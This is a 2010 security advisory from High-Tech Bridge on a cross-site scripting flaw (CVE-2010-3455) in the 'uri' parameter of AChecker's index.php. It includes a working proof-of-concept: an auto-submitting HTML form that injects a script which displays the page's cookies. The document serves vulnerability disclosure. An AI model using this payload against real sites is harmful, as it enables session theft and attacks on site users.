Cross-site Scripting (XSS) Vulnerability in AChecker

2010-09-01T00:00:00
ID HTB22601
Type htbridge
Reporter High-Tech Bridge
Modified 2010-09-03T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered vulnerability in AChecker which could be exploited to perform cross-site scripting attacks.

1) Cross-site scripting (XSS) vulnerability in AChecker: CVE-2010-3455
The vulnerability exists due to input sanitation error in the "uri" parameter in index.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
Exploitation example:
<form action="http://host/index.php" method="post" name="main" enctype="multipart/form-data" >
<input type="hidden" name="uri" value='http://1"><script>alert(document.cookie)</script>' />
<input type="hidden" name="validate_uri" value="Check It" />
<input type="hidden" name="MAX_FILE_SIZE" value="52428800" />
<input type="hidden" name="uploadfile"; filename="" />
<input type="hidden" name="gid[]" value="8" />
</form>
<script>
document.main.submit();
</script>